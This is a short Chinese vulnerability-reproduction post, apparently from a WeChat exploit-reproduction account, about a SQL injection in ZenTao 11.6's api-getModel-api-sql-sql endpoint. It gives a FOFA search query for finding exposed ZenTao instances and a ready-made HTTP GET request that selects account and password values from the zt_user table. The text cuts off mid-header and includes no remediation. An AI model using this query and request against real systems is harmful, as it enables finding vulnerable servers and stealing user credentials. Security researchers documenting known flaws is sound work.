文章目录
禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞
1. 禅道 简介
微信公众号搜索:南风漏洞复现文库
南风漏洞复现文库公众号首发
禅道 项目管理软件 是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug 管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期管理。
2.漏洞描述
禅道 11.6 zentao/api-getModel-api-sql-sql 版本中对用户接口调用权限过滤不完善,导致调用接口存在SQL注入漏洞。
3.影响版本
禅道 11.6
4.fofa 查询语句
“禅道项目管理系统”
5.漏洞复现
漏洞数据包
GET /zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-En